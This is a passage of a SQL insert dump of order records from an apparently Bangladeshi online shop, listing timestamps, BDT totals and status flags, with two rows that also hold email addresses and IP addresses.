(1191, 1, '2026-04-28 18:23:18', '2026-04-28 18:23:18', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1192, 1, '2026-04-28 20:23:57', '2026-04-28 20:24:01', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1193, 1, '2026-04-28 22:48:26', '2026-04-28 22:48:26', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1194, 1, '2026-04-28 22:55:02', '2026-04-28 22:55:08', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 337.6000, 337.6000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 422.0000, 422.0000, 337.6000, 337.6000, 1, 0, NULL, NULL, 0),
(1195, 1, '2026-04-29 03:53:17', '2026-04-29 03:53:19', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1196, 1, '2026-04-29 05:12:31', '2026-04-29 05:12:37', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 337.6000, 337.6000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 422.0000, 422.0000, 337.6000, 337.6000, 1, 0, NULL, NULL, 0),
(1197, 1, '2026-04-29 06:18:04', '2026-04-29 06:18:04', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1198, 1, '2026-04-29 07:45:19', '2026-04-29 07:45:25', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 337.6000, 337.6000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 422.0000, 422.0000, 337.6000, 337.6000, 1, 0, NULL, NULL, 0),
(1199, 1, '2026-04-29 11:27:30', '2026-04-29 11:27:50', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1200, 1, '2026-04-29 14:01:45', '2026-04-29 14:01:45', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1201, 1, '2026-04-29 19:05:14', '2026-04-29 19:05:17', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1202, 1, '2026-04-29 21:32:13', '2026-04-29 21:32:13', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1203, 1, '2026-04-30 02:37:51', '2026-04-30 02:37:53', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1204, 1, '2026-04-30 04:11:26', '2026-04-30 04:11:26', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 137, NULL, 1, 'e.ko.y.ijavux.uk2.8@gmail.com', NULL, 'faEbkkJDrzlDlhkkkPSQc', NULL, 'QNCxctlFQveQWTTZew', NULL, NULL, NULL, 1, 0, '104.244.76.237', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1205, 1, '2026-04-30 05:13:32', '2026-04-30 05:13:32', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1206, 1, '2026-04-30 10:14:04', '2026-04-30 10:14:06', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1207, 1, '2026-04-30 12:59:05', '2026-04-30 12:59:05', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1208, 1, '2026-04-30 17:55:22', '2026-04-30 17:55:24', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1209, 1, '2026-04-30 20:44:20', '2026-04-30 20:44:20', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1210, 1, '2026-04-30 22:07:44', '2026-04-30 22:07:44', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 138, NULL, 1, 'g.o.q.uqu.y.447@gmail.com', NULL, 'SPGhxmNfkNuSymqAdjEtszNH', NULL, 'ynShzhhrmODTJvjM', NULL, NULL, NULL, 1, 0, '45.80.158.165', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1211, 1, '2026-05-01 01:17:15', '2026-05-01 01:17:19', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1212, 1, '2026-05-01 04:08:17', '2026-05-01 04:08:17', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1213, 1, '2026-05-01 08:53:23', '2026-05-01 08:53:37', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1214, 1, '2026-05-01 10:39:21', '2026-05-01 10:39:32', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 337.6000, 337.6000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 422.0000, 422.0000, 337.6000, 337.6000, 1, 0, NULL, NULL, 0),
(1215, 1, '2026-05-01 10:39:32', '2026-05-01 10:39:32', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1216, 1, '2026-05-01 10:39:45', '2026-05-01 10:39:45', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1217, 1, '2026-05-01 10:39:51', '2026-05-01 10:39:51', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1218, 1, '2026-05-01 10:39:58', '2026-05-01 10:40:00', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 32.0000, 32.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 1, 0, NULL, NULL, 0),
(1219, 1, '2026-05-01 10:40:14', '2026-05-01 10:40:14', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1220, 1, '2026-05-01 10:40:20', '2026-05-01 10:40:29', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1221, 1, '2026-05-01 11:57:21', '2026-05-01 11:57:21', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1222, 1, '2026-05-01 16:20:42', '2026-05-01 16:20:45', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1223, 1, '2026-05-01 16:58:01', '2026-05-01 16:58:01', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1224, 1, '2026-05-01 19:40:42', '2026-05-01 19:40:42', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1225, 1, '2026-05-01 23:49:29', '2026-05-01 23:49:32', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1226, 1, '2026-05-02 03:00:39', '2026-05-02 03:00:39', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1227, 1, '2026-05-02 07:16:58', '2026-05-02 07:17:01', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1228, 1, '2026-05-02 10:31:16', '2026-05-02 10:31:16', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1229, 1, '2026-05-02 13:36:13', '2026-05-02 13:36:13', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1230, 1, '2026-05-02 15:17:20', '2026-05-02 15:17:22', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1231, 1, '2026-05-02 18:14:12', '2026-05-02 18:14:12', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1232, 1, '2026-05-02 23:12:12', '2026-05-02 23:12:14', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1233, 1, '2026-05-03 01:36:27', '2026-05-03 01:36:27', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1234, 1, '2026-05-03 06:42:32', '2026-05-03 06:42:36', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1235, 1, '2026-05-03 07:09:35', '2026-05-03 07:09:39', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 32.0000, 32.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 1, 0, NULL, NULL, 0),
(1236, 1, '2026-05-03 09:07:27', '2026-05-03 09:07:27', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1237, 0, '2026-05-03 14:14:39', '2026-05-03 14:14:39', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1238, 1, '2026-05-03 14:14:39', '2026-05-03 14:14:39', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1239, 1, '2026-05-03 14:20:12', '2026-05-03 14:20:16', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1240, 1, '2026-05-03 17:06:04', '2026-05-03 17:06:04', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1241, 1, '2026-05-03 21:53:05', '2026-05-03 21:53:10', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1242, 1, '2026-05-04 00:43:23', '2026-05-04 00:43:23', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1243, 1, '2026-05-04 05:21:16', '2026-05-04 05:21:25', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1244, 1, '2026-05-04 08:27:20', '2026-05-04 08:27:20', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1245, 1, '2026-05-04 12:59:21', '2026-05-04 12:59:40', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1246, 1, '2026-05-04 16:34:12', '2026-05-04 16:34:12', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1247, 1, '2026-05-04 20:43:18', '2026-05-04 20:43:20', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1248, 1, '2026-05-05 00:26:39', '2026-05-05 00:26:39', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1249, 1, '2026-05-05 01:43:19', '2026-05-05 01:43:19', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1250, 1, '2026-05-05 04:06:51', '2026-05-05 04:06:53', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1251, 1, '2026-05-05 08:00:35', '2026-05-05 08:00:35', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
